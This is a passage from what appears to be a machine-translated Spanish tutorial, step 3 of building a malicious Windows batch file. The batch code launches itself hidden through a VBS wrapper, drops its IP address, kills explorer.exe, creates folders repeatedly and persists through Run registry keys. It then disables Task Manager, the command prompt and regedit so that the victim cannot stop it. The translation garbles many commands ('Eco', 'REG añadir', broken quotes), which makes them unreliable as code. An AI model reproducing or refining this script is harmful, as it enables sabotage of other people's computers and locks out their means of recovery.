Paso 3: Agregar más el archivo por lotes
Actualmente el archivo por lotes debe verse algo como esto:de
Goto proceso
CreateObject("Wscript.Shell"). Ejecutar "" "& WScript.Arguments(0) &" "", 0, False
: proceso de
Escriba run.bat | encontrar "CreateObject" | encontrar/v "tipo" > invis.vbs
CD %windir%\system32
Eco wscript.exe "C:\windows\system32\invis.vbs" "Data_exe.bat" > Data_exe.bat
echo off > Data.bat
Eco de ipconfig /release >> Data.bat
Eco de taskkill explorer.exe >> Data.bat
Eco mkdir %% aleatoria %% >> Data.bat
Eco mkdir %% aleatoria %% >> Data.bat
REG añadir "HKCU\software\microsoft\windows\currentversion\run" /v seguridad /t reg_sz /d "% windir%\system32\Data_exe.bat" /f
REG añadir "HKLM\software\microsoft\windows\currentversion\run" /v seguridad /t reg_sz /d "% windir%\system32\Data_exet" /f
Ahora vamos a añadir un poco más, usted puede hacer para que el usuario tiene muy poca manera de detener esto por simplemente desestimar los más utilizados métodos de detener cosas como esta, como el administrador de tareas, el símbolo del sistema y regedit.
Esto es muy fácil de hacer, sólo tiene que añadir las siguientes líneas al archivo por lotes:
REG añadir "HKLM\Software\Policies\Microsoft\Windows\System /v DisableCMD /t REG_DWORD /d 2/f
REG añadir "HKCU\Software\Policies\Microsoft\Windows\System /v DisableCMD /t REG_DWORD /d 2/f
REG añadir "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1/f
REG añadir "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1/f
REG añadir "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1/f
REG añadir "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1/f